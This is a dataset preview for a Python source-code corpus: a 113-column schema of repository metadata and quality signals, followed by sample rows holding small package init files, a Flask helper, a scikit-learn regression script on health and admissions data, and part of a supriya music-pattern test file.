**Schema (113 columns)**

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
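A short sketch may help show how records with this schema are typically consumed. This is a minimal, hypothetical example: the dataset identifier `example/code-dataset` and the filter thresholds are illustrative assumptions, not values taken from this card.

```python
# Minimal sketch, assuming a Hugging Face dataset with the schema above.
# "example/code-dataset" is a placeholder id; thresholds are illustrative.
from datasets import load_dataset

# Stream the split so the full table never has to fit in memory.
ds = load_dataset("example/code-dataset", split="train", streaming=True)

def looks_clean(row):
    # Keep Python files with little long-n-gram duplication and sane line widths.
    return (
        row["lang"] == "Python"
        and row["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.5
        and row["max_line_length"] < 1000
    )

for row in filter(looks_clean, ds.take(1000)):
    print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["hits"])
```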
Example rows from the preview follow. Each row is shown as a field list; the `qsc_*` column names are shortened to their distinguishing segment (for example, `frac_chars_digital` in the `qsc_code_*_quality_signal` group stands for `qsc_code_frac_chars_digital_quality_signal`).

**Row 1**

- `hexsha`: `dd844765bb80e28d6b16d87fdea78b3aa78bd53e`; `size`: 103; `ext`: `py`; `lang`: Python
- Repo fields (identical across the `max_stars`/`max_issues`/`max_forks` groups): path `scripts/addons/animation_nodes/base_types/effects/__init__.py`, repo `Tilapiatsu/blender-custom_conf`, head `05592fedf74e4b7075a6228b8448a5cda10f7753`, licenses `["MIT"]`
- `max_stars_count`: 2 (events 2020-04-16T22:12:40.000Z to 2022-01-22T17:18:45.000Z); `max_issues_count`: null; `max_forks_count`: 2 (events 2019-05-16T04:01:09.000Z to 2020-08-25T11:42:26.000Z)
- `content`:

```python
from . code_effects import VectorizeCodeEffect, PrependCodeEffect, ReturnDefaultsOnExceptionCodeEffect
```

- `avg_line_length`: 51.5; `max_line_length`: 102; `alphanum_fraction`: 0.902913
- `qsc_code_*_quality_signal`: num_words=7, num_chars=103, mean_word_length=13.142857, frac_words_unique=1, frac_chars_top_2grams=0, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0.067961, size_file_byte=103, num_lines=1, num_chars_line_max=103, num_chars_line_mean=103, frac_chars_alphabet=0.958333, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0, cate_var_zero=true, frac_lines_pass=0, frac_lines_import=1, frac_lines_simplefunc=0, score_lines_no_logic=1, frac_lines_print=0
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=1, num_chars=0, mean_word_length=1, frac_words_unique=null, frac_chars_top_2grams=0, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0, size_file_byte=0, num_lines=1, num_chars_line_max=0, num_chars_line_mean=1, frac_chars_alphabet=0, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=0, cate_var_zero=1, frac_lines_pass=0, frac_lines_import=1, frac_lines_simplefunc=0, score_lines_no_logic=1, frac_lines_print=0
- `effective`: 0; `hits`: 7
**Row 2**

- `hexsha`: `dd8458880203c67b39b60a68b672af16d5441b01`; `size`: 139; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `flask_app/helpers.py`, repo `ad3002/BasicFlaskApp`, head `1604f99adeb8c771e2428e5ab6d90cc7c9cac2b5`, licenses `["MIT"]`
- `max_stars_count`, `max_issues_count`, `max_forks_count`: all null, with no event datetimes
- `content`:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import simplejson
def return_error(error):
    return simplejson.dumps({"error": error})
```

- `avg_line_length`: 15.444444; `max_line_length`: 45; `alphanum_fraction`: 0.661871
- `qsc_code_*_quality_signal`: num_words=18, num_chars=139, mean_word_length=5.055556, frac_words_unique=0.722222, frac_chars_top_2grams=0.21978, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0.008475, frac_chars_whitespace=0.151079, size_file_byte=139, num_lines=8, num_chars_line_max=46, num_chars_line_mean=17.375, frac_chars_alphabet=0.762712, frac_chars_comments=0.302158, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0.053191, frac_chars_long_word_length=0, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0.333333, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.333333, frac_lines_simplefunc=0.333333, score_lines_no_logic=1, frac_lines_print=0
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=1, num_chars=0, mean_word_length=0, frac_words_unique=null, frac_chars_top_2grams=1, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0, size_file_byte=0, num_lines=1, num_chars_line_max=0, num_chars_line_mean=0, frac_chars_alphabet=0, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=1, cate_var_zero=0, frac_lines_pass=0, frac_lines_import=1, frac_lines_simplefunc=1, score_lines_no_logic=1, frac_lines_print=0
- `effective`: 0; `hits`: 7
**Row 3**

- `hexsha`: `dda132453d6a5dc6fa5aea4d2aab8be742f5995b`; `size`: 106; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `easyrepo/__init__.py`, repo `kobibleu/easyrepo`, head `fdc3683d4a5b615c57e450e713de42598292fc74`, licenses `["MIT"]`
- `max_stars_count`, `max_issues_count`, `max_forks_count`: all null, with no event datetimes
- `content`:

```python
from easyrepo.interface.crud import CRUDRepository
from easyrepo.interface.paging import PagingRepository
```

- `avg_line_length`: 35.333333; `max_line_length`: 54; `alphanum_fraction`: 0.886792
- `qsc_code_*_quality_signal`: num_words=12, num_chars=106, mean_word_length=7.833333, frac_words_unique=0.666667, frac_chars_top_2grams=0.255319, frac_chars_top_3grams=0.446809, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0.075472, size_file_byte=106, num_lines=2, num_chars_line_max=55, num_chars_line_mean=53, frac_chars_alphabet=0.959184, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0, cate_var_zero=true, frac_lines_pass=0, frac_lines_import=1, frac_lines_simplefunc=0, score_lines_no_logic=1, frac_lines_print=0
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=1, num_chars=0, mean_word_length=0, frac_words_unique=null, frac_chars_top_2grams=1, frac_chars_top_3grams=1, frac_chars_top_4grams=0, frac_chars_dupe_5grams=0, frac_chars_dupe_6grams=0, frac_chars_dupe_7grams=0, frac_chars_dupe_8grams=0, frac_chars_dupe_9grams=0, frac_chars_dupe_10grams=0, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0, size_file_byte=0, num_lines=1, num_chars_line_max=0, num_chars_line_mean=0, frac_chars_alphabet=0, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=0, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=0, cate_var_zero=1, frac_lines_pass=0, frac_lines_import=1, frac_lines_simplefunc=0, score_lines_no_logic=1, frac_lines_print=0
- `effective`: 0; `hits`: 7
**Row 4**

- `hexsha`: `06f119ddd2b9c1647f8c543f7bf9135e39b31b67`; `size`: 7360; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `proyecto.py`, repo `Caro322/Proyecto-IA`, head `606d3b615cd8af39d85c3effca6e69151f348b8d`, licenses `["Apache-2.0"]`
- `max_stars_count`: 1 (events 2021-06-08T22:14:08.000Z to 2021-06-08T22:14:08.000Z); `max_issues_count`: null; `max_forks_count`: null
- `content`:

```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#Velocidad de onda de pulso
datos = pd.read_csv('signos.csv',sep=';', header=0)
cabecera = ["Peso","Altura","Diastolica","Siastolica","Pulso","Temperatura","Muscular","Hidratacion","Huesos","VOP","Saturacion"]
datos.columns = cabecera
datos.head()
from sklearn import decomposition
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA, KernelPCA
x1 = datos.values[:,0]
x2 = datos.values[:,1]
x3 = datos.values[:,2]
x4 = datos.values[:,3]
x5 = datos.values[:,4]
x6 = datos.values[:,5]
x7 = datos.values[:,6]
x8 = datos.values[:,7]
x9 = datos.values[:,8]
y = datos.values[:,9]
x10 = datos.values[:,10]
x0 = np.ones(x1.shape)
X = np.matrix([x0,x1,x2,x3,x4,x5,x6,x7,x8,x9,x10]).T
Y = np.matrix ([y]).T
type(X)
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
pca = decomposition.PCA(n_components=3,whiten=True,svd_solver='arpack')
pca.fit(X)
X = pca.transform(X)
#Regresión utilizando la transformada
Theta=np.linalg.inv(X.T*X)*(X.T)*Y
print(Theta)
plt.plot(x1,y,'bo')
plt.plot(x1, Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7+Theta[8,0]*x8+Theta[9,0]*x9+Theta[10,0]*x10)
plt.title('Final')
plt.show()
R=np.corrcoef((Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7+Theta[8,0]*x8+Theta[9,0]*x9+Theta[10,0]*x10),y)
R2=R**2
print(R2[0,1])
#Regresión lineal
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, r2_score
partition=15000
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = linear_model.LinearRegression()
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Coeficientes:', regr.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con máquina de soporte vectorial
from sklearn import svm
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
msv = svm.SVR(kernel='linear')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Coeficientes:', msv.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='rbf')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=2)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=3)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con redes neuronales
from sklearn.neural_network import MLPRegressor
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = MLPRegressor(random_state=1, max_iter=500).fit(X_train, y_train)
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Predicción de admisión a la universidad
datos = pd.read_csv('Admission_Predict.csv',sep=',', header=0)
cabecera = ["Serial","GRE","TOEFL","UniRating","Proposito","Recomendacion","GPA","Experiencia","P_Admisión"]
datos.columns = cabecera
datos.head()
datos.drop(["Serial"],axis=1,inplace=True)
datos.head()
from sklearn import decomposition
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA, KernelPCA
x1 = datos.values[:,0]
x2 = datos.values[:,1]
x3 = datos.values[:,2]
x4 = datos.values[:,3]
x5 = datos.values[:,4]
x6 = datos.values[:,5]
x7 = datos.values[:,6]
y = datos.values[:,7]
x0 = np.ones(x1.shape)
X = np.matrix([x0,x1,x2,x3,x4,x5,x6,x7]).T
Y = np.matrix ([y]).T
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
pca = decomposition.PCA(n_components=3,whiten=True,svd_solver='arpack')
pca.fit(X)
X = pca.transform(X)
#Regresión utilizando la transformada
Theta=np.linalg.inv(X.T*X)*(X.T)*Y
print(Theta)
plt.plot(x1,y,'bo')
plt.plot(x1, Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7)
plt.title('Final')
plt.show()
R=np.corrcoef((Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7),y)
R2=R**2
print(R2[0,1])
#Regresión lineal
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, r2_score
partition=300
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = linear_model.LinearRegression()
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Coeficientes:', regr.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con máquinas de soporte vectorial
from sklearn import svm
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
msv = svm.SVR(kernel='linear')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Coeficientes:', msv.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='rbf')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=2)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=3)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con redes neuronales
from sklearn.neural_network import MLPRegressor
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = MLPRegressor(random_state=1, max_iter=500).fit(X_train, y_train)
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
```

- `avg_line_length`: 23; `max_line_length`: 171; `alphanum_fraction`: 0.711549
- `qsc_code_*_quality_signal`: num_words=1248, num_chars=7360, mean_word_length=4.036058, frac_words_unique=0.125, frac_chars_top_2grams=0.035736, frac_chars_top_3grams=0.095295, frac_chars_top_4grams=0.047647, frac_chars_dupe_5grams=0.910264, frac_chars_dupe_6grams=0.892198, frac_chars_dupe_7grams=0.887433, frac_chars_dupe_8grams=0.887433, frac_chars_dupe_9grams=0.887433, frac_chars_dupe_10grams=0.887433, frac_chars_replacement_symbols=0, frac_chars_digital=0.03974, frac_chars_whitespace=0.121332, size_file_byte=7360, num_lines=319, num_chars_line_max=172, num_chars_line_mean=23.0721, frac_chars_alphabet=0.739137, frac_chars_comments=0.042663, cate_xml_start=0, frac_lines_dupe_lines=0.890547, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0.142126, frac_chars_long_word_length=0.002985, frac_lines_string_concat=0, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0
- `qsc_codepython_*_quality_signal`: cate_ast=1, frac_lines_func_ratio=0, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.104478, frac_lines_simplefunc=0, score_lines_no_logic=0.104478, frac_lines_print=0.159204
- Unsuffixed `qsc_code_*`/`qsc_codepython_*`: num_words=0, num_chars=0, mean_word_length=0, frac_words_unique=null, frac_chars_top_2grams=0, frac_chars_top_3grams=0, frac_chars_top_4grams=0, frac_chars_dupe_5grams=1, frac_chars_dupe_6grams=1, frac_chars_dupe_7grams=1, frac_chars_dupe_8grams=1, frac_chars_dupe_9grams=1, frac_chars_dupe_10grams=1, frac_chars_replacement_symbols=0, frac_chars_digital=0, frac_chars_whitespace=0, size_file_byte=0, num_lines=0, num_chars_line_max=0, num_chars_line_mean=0, frac_chars_alphabet=0, frac_chars_comments=0, cate_xml_start=0, frac_lines_dupe_lines=1, cate_autogen=0, frac_lines_long_string=0, frac_chars_string_length=0, frac_chars_long_word_length=0, frac_lines_string_concat=null, cate_encoded_data=0, frac_chars_hex_words=0, frac_lines_prompt_comments=0, frac_lines_assert=0, cate_ast=0, frac_lines_func_ratio=0, cate_var_zero=0, frac_lines_pass=0, frac_lines_import=0, frac_lines_simplefunc=0, score_lines_no_logic=0, frac_lines_print=0
- `effective`: 0; `hits`: 7
**Row 5**

- `hexsha`: `660a5d55180e6ccbe13c13a8a904ad05e80efd38`; `size`: 14355; `ext`: `py`; `lang`: Python
- Repo fields (identical across the three groups): path `tests/patterns/test_patterns_Ppar___iter__.py`, repo `butayama/supriya`, head `0c197324ecee4232381221880d1f40e109bb756c`, licenses `["MIT"]`
- `max_stars_count`, `max_issues_count`, `max_forks_count`: all null, with no event datetimes
- `content`:

```python
import pytest
import uqbar.strings
import supriya.patterns
pattern_01 = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002, 1003], 1),
)
]
)
pattern_02 = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002], 1),
),
supriya.patterns.Pmono(
amplitude=1.0,
duration=0.75,
frequency=supriya.patterns.Pseq([2001, 2002, 2003], 1),
),
]
)
pattern_03 = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002, 1003], 1),
),
supriya.patterns.Pbind(
amplitude=1.0, duration=0.75, frequency=supriya.patterns.Pseq([], 1)
),
]
)
pattern_04 = supriya.patterns.Ppar(
[
supriya.patterns.Pbus(
supriya.patterns.Pbind(
amplitude=1.0,
duration=0.75,
frequency=supriya.patterns.Pseq([1001, 1002, 1003], 1),
)
)
]
)
pattern_05 = supriya.patterns.Ppar(
[
supriya.patterns.Pbus(
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002], 1),
)
),
supriya.patterns.Pbus(
supriya.patterns.Pmono(
amplitude=1.0,
duration=0.75,
frequency=supriya.patterns.Pseq([2001, 2002, 2003], 1),
)
),
]
)
pattern_06 = supriya.patterns.Ppar(
[
supriya.patterns.Pgpar(
[
[
supriya.patterns.Pbind(
delta=10,
duration=10,
frequency=supriya.patterns.Pseq([1001, 1002, 1003]),
),
supriya.patterns.Pbind(
delta=12,
duration=10,
frequency=supriya.patterns.Pseq([2001, 2002, 2003]),
),
]
]
),
supriya.patterns.Pgpar(
[
[
supriya.patterns.Pbind(
delta=10,
duration=10,
frequency=supriya.patterns.Pseq([3001, 3002]),
),
supriya.patterns.Pbind(
delta=12,
duration=10,
frequency=supriya.patterns.Pseq([4001, 4002]),
),
]
]
),
]
)
def test___iter___01():
    events = list(pattern_01)
    assert pytest.helpers.get_objects_as_string(
        events, replace_uuids=True
    ) == uqbar.strings.normalize(
"""
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1001,
uuid=UUID('A'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1002,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1003,
uuid=UUID('C'),
)
"""
)
def test___iter___02():
    events = list(pattern_02)
    assert pytest.helpers.get_objects_as_string(
        events, replace_uuids=True
    ) == uqbar.strings.normalize(
"""
NoteEvent(
amplitude=1.0,
delta=0.0,
duration=1.0,
frequency=1001,
uuid=UUID('A'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=2001,
is_stop=False,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=0.25,
duration=0.75,
frequency=2002,
is_stop=False,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=0.5,
duration=1.0,
frequency=1002,
uuid=UUID('C'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=2003,
uuid=UUID('B'),
)
"""
)
def test___iter___03():
    events = list(pattern_03)
    assert pytest.helpers.get_objects_as_string(
        events, replace_uuids=True
    ) == uqbar.strings.normalize(
"""
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1001,
uuid=UUID('A'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1002,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1003,
uuid=UUID('C'),
)
"""
)
def test___iter___04():
    events = list(pattern_04)
    assert pytest.helpers.get_objects_as_string(
        events, replace_uuids=True
    ) == uqbar.strings.normalize(
"""
CompositeEvent(
events=(
BusEvent(
calculation_rate=CalculationRate.AUDIO,
channel_count=2,
uuid=UUID('A'),
),
GroupEvent(
uuid=UUID('B'),
),
SynthEvent(
add_action=AddAction.ADD_AFTER,
amplitude=1.0,
fade_time=0.25,
in_=UUID('A'),
synthdef=<SynthDef: system_link_audio_2>,
target_node=UUID('B'),
uuid=UUID('C'),
),
),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=1001,
